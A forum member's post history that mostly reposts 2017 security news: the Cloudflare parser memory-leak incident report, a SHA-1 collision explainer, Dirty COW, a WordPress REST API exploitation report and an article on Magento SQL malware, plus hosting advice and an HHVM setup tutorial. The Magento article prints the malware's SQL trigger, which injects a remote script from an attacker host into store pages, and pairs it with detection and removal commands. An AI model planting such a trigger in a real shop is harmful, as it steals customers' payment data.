Slate
Blackcurrant
Watermelon
Strawberry
Orange
Banana
Apple
Emerald
Chocolate
Marble
Slate
Blackcurrant
Watermelon
Strawberry
Orange
Banana
Apple
Emerald
Chocolate
Marble
-
Content Count
454 -
Joined
-
Last visited
-
Days Won
76 -
Feedback
N/A
Everything posted by NickTheGreek
-
Incident report on memory leak caused by Cloudflare parser bug Last Friday, Tavis Ormandy from Google’s Project Zero contacted Cloudflare to report a security problem with our edge servers. He was seeing corrupted web pages being returned by some HTTP requests run through Cloudflare. It turned out that in some unusual circumstances, which I’ll detail below, our edge servers were running past the end of a buffer and returning memory that contained private information such as HTTP cookies, authentication tokens, HTTP POST bodies, and other sensitive data. And some of that data had been cached by search engines. For the avoidance of doubt, Cloudflare customer SSL private keys were not leaked. Cloudflare has always terminated SSL connections through an isolated instance of NGINX that was not affected by this bug. We quickly identified the problem and turned off three minor Cloudflare features (email obfuscation, Server-side Excludes and Automatic HTTPS Rewrites) that were all using the same HTML parser chain that was causing the leakage. At that point it was no longer possible for memory to be returned in an HTTP response. Because of the seriousness of such a bug, a cross-functional team from software engineering, infosec and operations formed in San Francisco and London to fully understand the underlying cause, to understand the effect of the memory leakage, and to work with Google and other search engines to remove any cached HTTP responses. Having a global team meant that, at 12 hour intervals, work was handed over between offices enabling staff to work on the problem 24 hours a day. The team has worked continuously to ensure that this bug and its consequences are fully dealt with. One of the advantages of being a service is that bugs can go from reported to fixed in minutes to hours instead of months. The industry standard time allowed to deploy a fix for a bug like this is usually three months; we were completely finished globally in under 7 hours with an initial mitigation in 47 minutes. The bug was serious because the leaked memory could contain private information and because it had been cached by search engines. We have also not discovered any evidence of malicious exploits of the bug or other reports of its existence. The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage (that’s about 0.00003% of requests). We are grateful that it was found by one of the world’s top security research teams and reported to us. This blog post is rather long but, as is our tradition, we prefer to be open and technically detailed about problems that occur with our service. Parsing and modifying HTML on the fly Many of Cloudflare’s services rely on parsing and modifying HTML pages as they pass through our edge servers. For example, we can insert the Google Analytics tag, safely rewrite http:// links to https://, exclude parts of a page from bad bots, obfuscate email addresses, enable AMP, and more by modifying the HTML of a page. To modify the page, we need to read and parse the HTML to find elements that need changing. Since the very early days of Cloudflare, we’ve used a parser written using Ragel. A single .rl file contains an HTML parser used for all the on-the-fly HTML modifications that Cloudflare performs. About a year ago we decided that the Ragel-based parser had become too complex to maintain and we started to write a new parser, named cf-html, to replace it. This streaming parser works correctly with HTML5 and is much, much faster and easier to maintain. We first used this new parser for the Automatic HTTP Rewrites feature and have been slowly migrating functionality that uses the old Ragel parser to cf-html. Both cf-html and the old Ragel parser are implemented as NGINX modules compiled into our NGINX builds. These NGINX filter modules parse buffers (blocks of memory) containing HTML responses, make modifications as necessary, and pass the buffers onto the next filter. For the avoidance of doubt: the bug is not in Ragel itself. It is in Cloudflare's use of Ragel. This is our bug and not the fault of Ragel. It turned out that the underlying bug that caused the memory leak had been present in our Ragel-based parser for many years but no memory was leaked because of the way the internal NGINX buffers were used. Introducing cf-html subtly changed the buffering which enabled the leakage even though there were no problems in cf-html itself. Once we knew that the bug was being caused by the activation of cf-html (but before we knew why) we disabled the three features that caused it to be used. Every feature Cloudflare ships has a corresponding feature flag, which we call a ‘global kill’. We activated the Email Obfuscation global kill 47 minutes after receiving details of the problem and the Automatic HTTPS Rewrites global kill 3h05m later. The Email Obfuscation feature had been changed on February 13 and was the primary cause of the leaked memory, thus disabling it quickly stopped almost all memory leaks. Within a few seconds, those features were disabled worldwide. We confirmed we were not seeing memory leakage via test URIs and had Google double check that they saw the same thing. We then discovered that a third feature, Server-Side Excludes, was also vulnerable and did not have a global kill switch (it was so old it preceded the implementation of global kills). We implemented a global kill for Server-Side Excludes and deployed a patch to our fleet worldwide. From realizing Server-Side Excludes were a problem to deploying a patch took roughly three hours. However, Server-Side Excludes are rarely used and only activated for malicious IP addresses. Root cause of the bug The Ragel code is converted into generated C code which is then compiled. The C code uses, in the classic C manner, pointers to the HTML document being parsed, and Ragel itself gives the user a lot of control of the movement of those pointers. The underlying bug occurs because of a pointer error. /* generated code */ if ( ++p == pe ) goto _test_eof; The root cause of the bug was that reaching the end of a buffer was checked using the equality operator and a pointer was able to step past the end of the buffer. This is known as a buffer overrun. Had the check been done using >= instead of == jumping over the buffer end would have been caught. The equality check is generated automatically by Ragel and was not part of the code that we wrote. This indicated that we were not using Ragel correctly. The Ragel code we wrote contained a bug that caused the pointer to jump over the end of the buffer and past the ability of an equality check to spot the buffer overrun. Here’s a piece of Ragel code used to consume an attribute in an HTML <script> tag. The first line says that it should attempt to find zero of more unquoted_attr_char followed by (that’s the :>> concatenation operator) whitespace, forward slash or then > signifying the end of the tag. script_consume_attr := ((unquoted_attr_char)* :>> (space|'/'|'>')) >{ ddctx("script consume_attr"); } @{ fhold; fgoto script_tag_parse; } $lerr{ dd("script consume_attr failed"); fgoto script_consume_attr; }; If an attribute is well-formed, then the Ragel parser moves to the code inside the @{ } block. If the attribute fails to parse (which is the start of the bug we are discussing today) then the $lerr{ } block is used. For example, in certain circumstances (detailed below) if the web page ended with a broken HTML tag like this: <script type= the $lerr{ } block would get used and the buffer would be overrun. In this case the $lerr does dd(“script consume_attr failed”); (that’s a debug logging statement that is a nop in production) and then does fgoto script_consume_attr; (the state transitions to script_consume_attr to parse the next attribute). From our statistics it appears that such broken tags at the end of the HTML occur on about 0.06% of websites. If you have a keen eye you may have noticed that the @{ } transition also did a fgoto but right before it did fhold and the $lerr{ } block did not. It’s the missing fhold that resulted in the memory leakage. Internally, the generated C code has a pointer named p that is pointing to the character being examined in the HTML document. fhold is equivalent to p-- and is essential because when the error condition occurs p will be pointing to the character that caused the script_consume_attr to fail. And it’s doubly important because if this error condition occurs at the end of the buffer containing the HTML document then p will be after the end of the document (p will be pe + 1 internally) and a subsequent check that the end of the buffer has been reached will fail and p will run outside the buffer. Adding an fhold to the error handler fixes the problem. Why now That explains how the pointer could run past the end of the buffer, but not why the problem suddenly manifested itself. After all, this code had been in production and stable for years. Returning to the script_consume_attr definition above: script_consume_attr := ((unquoted_attr_char)* :>> (space|'/'|'>')) >{ ddctx("script consume_attr"); } @{ fhold; fgoto script_tag_parse; } $lerr{ dd("script consume_attr failed"); fgoto script_consume_attr; }; What happens when the parser runs out of characters to parse while consuming an attribute differs whether the buffer currently being parsed is the last buffer or not. If it’s not the last buffer, then there’s no need to use $lerr as the parser doesn’t know whether an error has occurred or not as the rest of the attribute may be in the next buffer. But if this is the last buffer, then the $lerr is executed. Here’s how the code ends up skipping over the end-of-file and running through memory. The entry point to the parsing function is ngx_http_email_parse_email (the name is historical, it does much more than email parsing). ngx_int_t ngx_http_email_parse_email(ngx_http_request_t *r, ngx_http_email_ctx_t *ctx) { u_char *p = ctx->pos; u_char *pe = ctx->buf->last; u_char *eof = ctx->buf->last_buf ? pe : NULL; You can see that p points to the first character in the buffer, pe to the character after the end of the buffer and eof is set to pe if this is the last buffer in the chain (indicated by the last_buf boolean), otherwise it is NULL. When the old and new parsers are both present during request handling a buffer such as this will be passed to the function above: (gdb) p *in->buf $8 = { pos = 0x558a2f58be30 "<script type=\"", last = 0x558a2f58be3e "", [...] last_buf = 1, [...] } Here there is data and last_buf is 1. When the new parser is not present the final buffer that contains data looks like this: (gdb) p *in->buf $6 = { pos = 0x558a238e94f7 "<script type=\"", last = 0x558a238e9504 "", [...] last_buf = 0, [...] } A final empty buffer (pos and last both NULL and last_buf = 1) will follow that buffer but ngx_http_email_parse_email is not invoked if the buffer is empty. So, in the case where only the old parser is present, the final buffer that contains data has last_buf set to 0. That means that eof will be NULL. Now when trying to handle script_consume_attr with an unfinished tag at the end of the buffer the $lerr will not be executed because the parser believes (because of last_buf) that there may be more data coming. The situation is different when both parsers are present. last_buf is 1, eof is set to pe and the $lerr code runs. Here’s the generated code for it: /* #line 877 "ngx_http_email_filter_parser.rl" */ { dd("script consume_attr failed"); {goto st1266;} } goto st0; [...] st1266: if ( ++p == pe ) goto _test_eof1266; The parser runs out of characters while trying to perform script_consume_attr and p will be pe when that happens. Because there’s no fhold (that would have done p--) when the code jumps to st1266 p is incremented and is now past pe. It then won’t jump to _test_eof1266 (where EOF checking would have been performed) and will carry on past the end of the buffer trying to parse the HTML document. So, the bug had been dormant for years until the internal feng shui of the buffers passed between NGINX filter modules changed with the introduction of cf-html. Going bug hunting Research by IBM in the 1960s and 1970s showed that bugs tend to cluster in what became known as “error-prone modules”. Since we’d identified a nasty pointer overrun in the code generated by Ragel it was prudent to go hunting for other bugs. Part of the infosec team started fuzzing the generated code to look for other possible pointer overruns. Another team built test cases from malformed web pages found in the wild. A software engineering team began a manual inspection of the generated code looking for problems. At that point it was decided to add explicit pointer checks to every pointer access in the generated code to prevent any future problem and to log any errors seen in the wild. The errors generated were fed to our global error logging infrastructure for analysis and trending. #define SAFE_CHAR ({\ if (!__builtin_expect(p < pe, 1)) {\ ngx_log_error(NGX_LOG_CRIT, r->connection->log, 0, "email filter tried to access char past EOF");\ RESET();\ output_flat_saved(r, ctx);\ BUF_STATE(output);\ return NGX_ERROR;\ }\ *p;\ }) And we began seeing log lines like this: 2017/02/19 13:47:34 [crit] 27558#0: *2 email filter tried to access char past EOF while sending response to client, client: 127.0.0.1, server: localhost, request: "GET /malformed-test.html HTTP/1.1” Every log line indicates an HTTP request that could have leaked private memory. By logging how often the problem was occurring we hoped to get an estimate of the number of times HTTP request had leaked memory while the bug was present. In order for the memory to leak the following had to be true: The final buffer containing data had to finish with a malformed script or img tag The buffer had to be less than 4k in length (otherwise NGINX would crash) The customer had to either have Email Obfuscation enabled (because it uses both the old and new parsers as we transition), … or Automatic HTTPS Rewrites/Server Side Excludes (which use the new parser) in combination with another Cloudflare feature that uses the old parser. … and Server-Side Excludes only execute if the client IP has a poor reputation (i.e. it does not work for most visitors). That explains why the buffer overrun resulting in a leak of memory occurred so infrequently. Additionally, the Email Obfuscation feature (which uses both parsers and would have enabled the bug to happen on the most Cloudflare sites) was only enabled on February 13 (four days before Tavis’ report). The three features implicated were rolled out as follows. The earliest date memory could have leaked is 2016-09-22. 2016-09-22 Automatic HTTP Rewrites enabled 2017-01-30 Server-Side Excludes migrated to new parser 2017-02-13 Email Obfuscation partially migrated to new parser 2017-02-18 Google reports problem to Cloudflare and leak is stopped The greatest potential impact occurred for four days starting on February 13 because Automatic HTTP Rewrites wasn’t widely used and Server-Side Excludes only activate for malicious IP addresses. Internal impact of the bug Cloudflare runs multiple separate processes on the edge machines and these provide process and memory isolation. The memory being leaked was from a process based on NGINX that does HTTP handling. It has a separate heap from processes doing SSL, image re-compression, and caching, which meant that we were quickly able to determine that SSL private keys belonging to our customers could not have been leaked. However, the memory space being leaked did still contain sensitive information. One obvious piece of information that had leaked was a private key used to secure connections between Cloudflare machines. When processing HTTP requests for customers’ web sites our edge machines talk to each other within a rack, within a data center, and between data centers for logging, caching, and to retrieve web pages from origin web servers. In response to heightened concerns about surveillance activities against Internet companies, we decided in 2013 to encrypt all connections between Cloudflare machines to prevent such an attack even if the machines were sitting in the same rack. The private key leaked was the one used for this machine to machine encryption. There were also a small number of secrets used internally at Cloudflare for authentication present. External impact and cache clearing More concerning was that fact that chunks of in-flight HTTP requests for Cloudflare customers were present in the dumped memory. That meant that information that should have been private could be disclosed. This included HTTP headers, chunks of POST data (perhaps containing passwords), JSON for API calls, URI parameters, cookies and other sensitive information used for authentication (such as API keys and OAuth tokens). Because Cloudflare operates a large, shared infrastructure an HTTP request to a Cloudflare web site that was vulnerable to this problem could reveal information about an unrelated other Cloudflare site. An additional problem was that Google (and other search engines) had cached some of the leaked memory through their normal crawling and caching processes. We wanted to ensure that this memory was scrubbed from search engine caches before the public disclosure of the problem so that third-parties would not be able to go hunting for sensitive information. Our natural inclination was to get news of the bug out as quickly as possible, but we felt we had a duty of care to ensure that search engine caches were scrubbed before a public announcement. The infosec team worked to identify URIs in search engine caches that had leaked memory and get them purged. With the help of Google, Yahoo, Bing and others, we found 770 unique URIs that had been cached and which contained leaked memory. Those 770 unique URIs covered 161 unique domains. The leaked memory has been purged with the help of the search engines. We also undertook other search expeditions looking for potentially leaked information on sites like Pastebin and did not find anything. Some lessons The engineers working on the new HTML parser had been so worried about bugs affecting our service that they had spent hours verifying that it did not contain security problems. Unfortunately, it was the ancient piece of software that contained a latent security problem and that problem only showed up as we were in the process of migrating away from it. Our internal infosec team is now undertaking a project to fuzz older software looking for potential other security problems. Detailed Timeline We are very grateful to our colleagues at Google for contacting us about the problem and working closely with us through its resolution. All of which occurred without any reports that outside parties had identified the issue or exploited it. All times are UTC. 2017-02-18 0011 Tweet from Tavis Ormandy asking for Cloudflare contact information 2017-02-18 0032 Cloudflare receives details of bug from Google 2017-02-18 0040 Cross functional team assembles in San Francisco 2017-02-18 0119 Email Obfuscation disabled worldwide 2017-02-18 0122 London team joins 2017-02-18 0424 Automatic HTTPS Rewrites disabled worldwide 2017-02-18 0722 Patch implementing kill switch for cf-html parser deployed worldwide 2017-02-20 2159 SAFE_CHAR fix deployed globally 2017-02-21 1803 Automatic HTTPS Rewrites, Server-Side Excludes and Email Obfuscation re-enabled worldwide NOTE: This post was updated to reflect updated information. https://blog.cloudflare.com/incident-report-on-memory-leak-caused-by-cloudflare-parser-bug/
-
Back in the old days, “going online” meant calling up with your modem at 300 bits per second and interacting slowly with a basic command prompt (sometimes BASIC in the literal sense). Noise on the line and other electrical interference could easily turn zeros into ones and vice versa, causing corruption in your session, such as BANANA turned into BANAMA, MANGO into MaNGO, or evenONLINE into +++ATZ. A common way to spot obvious errors automatically was by using a checksum, quite literally calculated by checking the sum of all the numeric values of every byte in the message. Checksums were used because they were quick to calculate, as far back as the 1960s and 1970s, because even the most underpowered processors usually had an ADD or ACCUMULATE instruction that could efficiently maintain a running total of this sort. But checksums were error prone. If you swap round any of the bytes in a message, the checksum remains unchanged because A+B = B+A. Likewise, two errors can easily cancel out, for example if BANANA gets corrupted into CANAMA, because (A+1) + (B-1) = A+B. Enter the CRC CRCs, short for cyclic redundancy checks, were a better solution, using a comparatively simple series of bit-shifts and XOR operations to maintain a bigger accumulator that wasn’t so easily fooled by double errors or swapped bytes. CRC-32 produces a 32-bit (4-byte) checksum – today, the term checksum is used metaphorically, not literally to mean that the bytes were added together – designed to do a much better job of detecting accidental errors such as those caused by mistyping or by modem corruption. But CRCs aren’t any good against deliberate errors. That’s because CRCs are based on a process involving a form of long division, making the algorithm predictable, so the output can be tweaked to be whatever you like by tweaking the input slightly in a way that can be calculated automatically. That makes it trivial to create a message with any checksum you like, for example so that its checksum matches an earlier message in order to create confusion, commit fraud, or worse. Note that there are only 4 billion (232) different possible CRC-32 values, so that at modern computer speeds you could forge a CRC-32 without any arithmetical trickery by brute force, simply by making billions of random modifications to the message until you hit paydirt. But even if you extend your CRC to 64 bits, 128 bits or even more to make accidental duplicates as good as impossible, it’s still easy to calculate forgeries very quickly, with no need to rely on brute force. Moving up to cryptographic hashes For security-related purposes, you need what’s commonly referred to as a cryptographic checksum orcryptographic hash. This sort of algorithm is designed not only to detect accidental errors, but also to be “untrickable” enough to prevent deliberate errors. In particular, a cryptographic hash, denoted here as a mathematical function H(), should have at least these characteristics: If you deliberately create two messages M1 and M2 (any two messages; you get to choose both of them) such that H(M1) = H(M2), you have a collision, so that H has failed as a digital fingerprint. Therefore you should not be able to construct a collision, other than by trying over and over with different inputs until you hit the jackpot by chance. If you know that H(M) = X, but you don’t know my message M, then you should not be able to “go backwards” from X to M, other than by trying different messages over and over until you hit the jackpot by chance. If I choose M and tell you what it is, so you can compute H(M) = X for yourself, you should not be able to come up with a different message M’ that also has H(M’) = X, other than by guesswork. (This is much tougher than case 1 because you don’t get to choose any matching pair of hashes from a giant pool of messages. You have to match my hash, not anyhash, which squares the effort needed.) For many years, an algorithm called MD5 was widely used because it claimed to provide these three protections against abuse, but it is now forbidden in the cryptographic world because it is known to fail on Promise One above. Once a hashing algorithm fails in respect of Promise One, it’s prudent to assume it won’t meet its other design goals either, even if it seems to be holding out on the other two promises. MD5 collisions are easy to generate on purpose, so the algorithm can no longer be trusted. SHA-1 replaces MD5 SHA-1 was the next-most-complex hash after MD5, and was widely used as a replacement when MD5 fell out of favour. Greatly oversimplified, the SHA-1 algorithm consumes its input in blocks of sixteen 32-bit words (512 bits, or 64 bytes), mixing each block into a cumulative hash of five 32-bit words (160 bits, or 20 bytes). for block in blocks() do for i = 17 to 80 do -- each step here extends the original 16-word input -- block to 80 words by adding one word made by mixing -- together four of the previous sixteen words. block[i] = minimixtogether(block,i) end for i = 1 to 80 do -- each step here mixes one of the words from the 80-word -- "extended block" into the five-byte hash accumulator hash = giantmixtogether(block,i) end end The giantmixtogether() function that scrambles the extended input into the hash uses a range of different operations, including NOT, AND, OR, XOR, ADD and ROL (rotate left); the minimixtogether()function used to massage the input data uses XOR and ROL. The algorithm certainly looks complicated, and at first glance you would assume that it mixes-minces-shreds-and-liquidises its input more than well enough to be “untrickable”. Indeed, the complexity of SHA-1 was considered sufficient to immunise it against the weaknesses in the similar but simpler MD5 algorithm. At the same time, SHA-1 was not so much more complicated han MD5 that it would run too slowly to be a convenient replacement. SHA-1 considered harmful For years, however, experts have been telling everyone to stop using SHA-1, and to use more complex hash algorithms such as SHA-2 and SHA-3 instead, predicting that the first actual real-world, in-your-face chink in SHA-1’s armour would turn up soon. Google’s Chrome browser, for example, stopped accepting web site certificates with SHA-1 hashes at the start of 2017, considering them no longer safe enough. The Mozilla Firefox browser will soon follow suit. The reason is simple: as soon as someone actually turns theory into reality, and produces a hash collision, you can no longer rely on saying, “She’ll be right for a while yet,” because your “while yet” period just expired. So it’s a good idea to get ahead of the game and to abandon creaky cryptographic code before it goes “Bang!” Even if a collision takes an enormous amount of work – imagine that you’d need 110 top-end graphics cards running flat out for a whole year, for example – the first actual collision would be what you might call the digital disproof of the pudding. The digital disproof So, to cut what has become a long story short, you need to know that researchers from Google and the CWI Institute in Amsterdam… …have just disproved the pudding. Bang! A hash collision that in theory should have taken them thousands of years to stumble upon by chance has been created on purpose within all of our lifetimes – and that should simply never have happened. Apparently, they did indeed need 110 top-end graphics cards running for a whole year, but that is still 100,000 times faster than the design goals (and the theoretical strength) of SHA-1, making SHA-1 a risky proposition for evermore. TL;DR: SHA-1 really is broken, so use a stronger hash from now on, because cryptographic attacks only ever get faster. https://nakedsecurity.sophos.com/2017/02/23/bang-sha-1-collides-at-38762cf7f55934b34d179ae6a4c80cadccbb7f0a/
-
https://dirtycow.ninja/
-
Dirty COW (Dirty copy-on-write) is a computer security vulnerability for the Linux kernel that affects all Linux-based operating systems including Android. It is a local privilege escalation bug that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem. The vulnerability was discovered by Phil Oester. Because of the race condition, with the right timing, a local attacker can exploit the copy-on-write mechanism to turn a read-only mapping of a file into a writable mapping. Although it is a local privilege escalation bug, remote attackers can use it in conjunction with other exploits that allow remote execution of non-privileged code to achieve remote root access on a computer.[1] The attack itself does not leave traces in the system log. The vulnerability has the CVE designation CVE-2016-5195. The Debian operating system distribution has announced that it has released a patch for the vulnerability . Dirty Cow was one of the first security issues transparently fixed in Ubuntu by the Canonical Live Patch service. It has been demonstrated that the bug can be utilized to root any Android device up to Android version 7 History The bug has been lurking in the Linux kernel since version 2.6.22 released in September 2007, and there is information about been actively exploited at least since October 2016.[2] The bug has been patched in Linux kernel versions 4.8.3, 4.7.9, 4.4.26 and newer. Applications The Dirty COW vulnerability has many perceived use cases including proven examples, such as obtaining root permissions in Android devices, as well as several speculated implementations. There are many binaries used in linux which are read-only, and can only be modified or written to by a user of higher permissions, such as the root. When privileges are escalated, whether by genuine or ingenuine means – such as by using the Dirty COW exploit – the user can modify, usually unmodifiable binaries and files. If a malicious individual could use the Dirty COW vulnerability to escalate their permissions, they could change a file, such as /bin/bash, so that it performs an additional, unexpected functions, such as a keylogger. When a standard user uses /bin/bash, they will not know that they are actually providing their passwords and activity to a malicious third-party. Remedies and recourse At the dawn of its discovery, anyone using a machine running Linux was susceptible to the exploit. The only perfect cure to this exploit is a patch or running a newer version which is not vulnerable anymore. Linus Torvalds committed a patch on 18/10/2016 acknowledging that it was an ancient bug that was actually attempted to be fixed once eleven years ago. Some distributors provide patches, such as Canonical, who provide a live patch. In the absence of a patch, there are a few mitigation technologies including STAP, and very little security from SELinux or AppArmor. Antivirus software has the potential to detect elevated permissions attacks, but it cannot prevent the attack. When given the opportunity, the safest route is to upgrade the Linux kernel to the following versions Earliest kernel version fixed Linux OS that uses this 3.2.0-113.155 Ubuntu 12.04 LTS 3.13.0-100.147 Ubuntu 14.04 LTS (Linux Mint 17.1) 3.16.36-1+deb8u2 Debian 8 4.4.0-45.66 Ubuntu 16.04 LTS 4.7.8-1 Debian unstable 4.8.0-26.28 Ubuntu 16.10 https://en.wikipedia.org/wiki/Dirty_COW
-
10 Illustrations That Show Just How Much the Internet Has Changed Our Lives None of us should ever succumb to panic — real life is definitely still out there despite the huge role that the Internet plays in modern life. Gadgets and technology play a part in our lives, but it really is just a part. Nevertheless, it’s funny to think about the hundreds of little ways these things have changed our behavior. Here are 10 of the ones we at Bright Side have noticed. How many do you recognize? Illustrator: Astkhik Rakimova exclusively for Bright Side Preview photo credit Laughing Colours
-
Security experts have discovered a new SQL malware targeting online shops running on Magento that hides the code in the website’s database. Security experts have discovered a new strain of malware that is targeted websites raising Russian the Magento eCommerce platform. The novelty is that this is the first a malware that hides the code in the website’s database is completely written in SQL. The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page. The researchers Willem de Groot that first analyzed the SQL malware discovered by Jeroen Boersma explained that this is a significant evolution on the threat landscape. “The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot. “This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.” The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites. In order to discover the presence of the SQL malware, administrators have to inspect the database searching for suspicious SQL triggers such as containing admin, .js, script or < (html tags). echo 'SHOW TRIGGERS' | n98-magerun db:console Once discovered the malicious trigger it is possible to delete it with a command like the following one: echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console According to the expert, SQL malware attacks starts with a brute force attack on /rss/catalog/notifystock/ for an otherwise completely patched shop. Below the pattern discovered by Jeroen Boersma: TRIGGER `after_insert_order` AFTER INSERT ON `sales_flat_order` FOR EACH ROW BEGIN UPDATE core_config_data SET value = IF( value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', value, CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ) WHERE path='design/head/includes' OR path='design/footer/absolute_footer' OR path='design/footer/copyright';\ UPDATE cms_block SET content= IF( content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', content, CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ); END; de Groot has updated the Magereport and the Malware Scanner to detect this new type of malware. http://securityaffairs.co/wordpress/56373/malware/sql-malware.html
-
Choosing a web hosting company is a big decision having many consequences. The hosting company greatly influences your website’s speed and reliability, causing your visitors to leave with either a good or bad impression. Whether you’re looking to host your very first site or want to move an existing site to a new provider, taking the time to think through each of the following items can help you feel confident that you have made the best decision that will meet your needs long into the future. Physical Hardware—Physical hardware running your site being one of the most important considerations, take the time to research the server types of a hosting company is using. Is high-speed SSD storage included? Does it use redundant devices, such as RAID-configured hard drives? What is its response time when replacing failed hardware and are backups onsite? Technical Support Team—No matter how good a host may be, it’s likely you’ll need to work with its support team at some point. Discover your comfort level when communicating with them upfront, as this may very well impact how quickly you arrive at issue resolution. Response Times & Contact Options—Some web hosts require that you work through their ticketing system. Others have a phone-in option, use live web chat, or want you to reach them via email. So what is the best way to get in touch with them? Is the team available 24/7 or only during certain hours? Reputation—In evaluating host contenders, reading reviews can help you make a more informed decision. A company I worked for (Hostadvice.com) is one of the resources you can use here—it’s a community of webmasters who share their experiences with different hosting providers to help find the most suitable option. Hosting Features—Beyond providing you a server(s) where you can load your site contents, some hosts include many features, others make them available as add-ons, and still others don’t offer any of them. These include: Disk storage and bandwidth limitations Software installation script library SSL certificates Website design tools and themes Daily backups and fee for restores (if any) Site migration SPAM protection Domain registration and privacy protection Acquaint yourself with each host’s feature list in determining those that best match your specific needs. Price of Hosting—Web host pricing is nowhere near uniform. Only by taking the time to comparatively shop will you finding a company that offers high quality hosting at a reasonable price. Determine accepted payment methods and look for discounts if you’re able to pay for service a year in advance. Control Panel —A control panel or portal is the interface you’ll use to manage your website once it’s live. Here you can do such tasks as perform a manual backup, reset your server (if allowed), or configure additional domains. Two of most popular control panel options are cPanel and Plesk. Choosing a host that offers one of these helps make site maintenance easier. Datacenter Geolocation—Having your site hosted at a datacenter that is geographically close to your target audience helps maximize site load speed experienced by your visitors.Having said that, organizations catering to a global audience should disregard this and consider using a content delivery network instead (see below), as it will replicate their website in multiple geolocations to improve performance. Content Delivery Network—If your site is likely to have high bandwidth requirements, serve large files, or have other significant demands, you’ll want a content delivery network (CDN) to serve up at least a portion of your content. A CDN enables your site to quickly and efficiently serve a very high number of customers—performance that isn’t always possible using traditional hosting options. The host should also make CDN integration easy for you. Website Security —In addition to other threats, distributed denial of service (DDoS) attacks are a frequent cyberattack form, with millions of sites being hit every day at a rate of tens, or even hundreds of gigs per second. Protection is a critical component for any website. Most web hosts offer basic security/firewall and DDoS protection, but the most effective threat mitigation available today involves routing all of your site traffic through a service that scrubs out nefarious traffic before it has an opportunity to wreak havoc with your content. Room for Growth—In starting a new website, perhaps you only need a simple, shared hosting account. But once it becomes a success, your hosting needs will likely grow commensurately. In looking ahead, then, you may want to use a hosting company that provides such expansion options as virtual private servers (VPSs), dedicated servers, cloud hosting, and more. https://www.incapsula.com/blog/choosing-web-host.html
-
Last week, we reported about a critical zero-day flaw in WordPress that was silently patched by the company before hackers have had their hands on the nasty bug to exploit millions of WordPress websites. To ensure the security of millions of websites and its users, WordPress delayed the vulnerability disclosure for over a week and worked closely with security companies and hosts to install the patch, ensuring that the issue was dealt with in short order before it became public. But even after the company's effort to protect its customers, thousands of admins did not bother to update their websites, which are still vulnerable to the critical bug and has already been exploited by hackers. While WordPress includes a default feature that automatically updates unpatched websites, some admins running critical services disable this feature for first testing and then applying patches. Even the news blog of one of the famous Linux distribution OpenSUSE (news.opensuse.org) was also hacked, but restored immediately without breach of any other part of openSUSE's infrastructure, CIO reports. The vulnerability resided in Wordpress REST API that would lead to the creation of new flaws, allowing an unauthenticated attacker to delete pages or modify all pages on unpatched websites and redirect their visitors to malicious exploits and a large number of attacks. The security researcher at Sucuri, who privately disclosed the flaw to WordPress, said they started noticing the attacks leveraging this bug less than 48 hours after disclosure. They noticed at least four different campaigns targeting still unpatched websites. In one such campaign, hackers were successful in replacing the content of over 66,000 web pages with "Hacked by" messages. Rest campaigns have targeted roughly 1000 pages in total. Besides defacing websites, such attacks appear to be carried out mostly for black hat SEO campaign in order to spread spam and gain ranking in search engine, which is also known as search engine poisoning. "What we expect to see is a lot more SEO spam (Search Engine Poisoning) attempts moving forward," explained Daniel Cid, CTO, and founder of Sucuri. "There’s already a few exploit attempts that try to add spam images and content to a post. Due to the monetization possibilities, this will likely be the #1 route to abuse this vulnerability." So, site administrators who have not yet updated their websites to the latest WordPress release 4.7.2 are urged to patch them immediately before becoming next target of SEO spammers and hackers. http://thehackernews.com/2017/02/wordpress-hack-seo.html
-
Ναί, στην ίδια ενότητα μπορεί κανείς ελεύθερα να εκφράσει την - προσωπική του - άποψη πάντα. Προφανώς για παράδειγμα οι εμπειρίες μου ως πελάτη δεν ισοδυναμούν απαραίτητα με αξιόπιστη κριτική για μια εταιρεία, ακόμα και αν τα κίνητα μου είναι ειλικρινή και ανιδιοτελή.
-
Είναι σημαντικό σε τέτοιες περιπτώσεις πάντως να έχεις κάπως μακρόχρονη συνεργασία και ειδικά εμπειρία σε περιπτώσεις που χρειάστηκε το εκεί support
-
Introduction If you’ve never heard about HHVM, it’s an open-source Virtual Machine designed for executing programs written in Hack and PHP. For performance reasons, it uses a just-in-time compilation process. Just like other similar projects, HHVM performs execution in a two-phase approach: first, it compiles PHP and Hack in an intermediate bytecode, then this bytecode is translated into AMD64 machine code at runtime, with a JIT (just-in-time) compiler. This tutorial demonstrates how to install WordPress with MariaDB, Nginx and, of course, HHVM on Ubuntu 16.04. Prerequisites As stated on the official page, HHVM supports only 64 bit architectures, so you need Ubuntu 16.04 Server 64bit. Install Nginx First, we install Nginx, which is available in Ubuntu repositories. Execute the following command: # apt install nginx The installation process is very quick. When it is complete, start Nginx: # systemctl start nginx Install and configure MariaDB MariaDB is also available in the repository, so just use apt: # apt-get install mariadb-client mariadb-server MariaDB is a MySQL fork, and it uses its name for the systemd service: # systemctl start mysql Set MariaDB root password to secure your database: # mysql_secure_installation You will be asked for the following configuration parameters: Enter current password for root (enter for none): PRESS ENTER Set root password? [Y/n] Y ENTER YOUR PASSWORD Remove anonymous users? [Y/n] Y Disallow root login remotely? [Y/n] Y Remove test database and access to it? [Y/n] Y Reload privilege tables now? [Y/n] Y Once that step is complete you can access the MariaDB database with your password: $ mysql -u root -p Use the MariaDB prompt to create a new database for WordPress. In this tutorial, we use mywordpressdb as the database name, and wordpressuser as the username for the WP installation. So our code looks like this: mysql> CREATE DATABASE mywordpressdb; mysql> CREATE USER wordpressuser@localhost IDENTIFIED BY 'my_strong_password'; mysql> GRANT ALL PRIVILEGES ON mywordpressdb.* to wordpressuser@localhost IDENTIFIED BY 'my_strong_password'; Next, you can flush privileges and exit: mysql> FLUSH 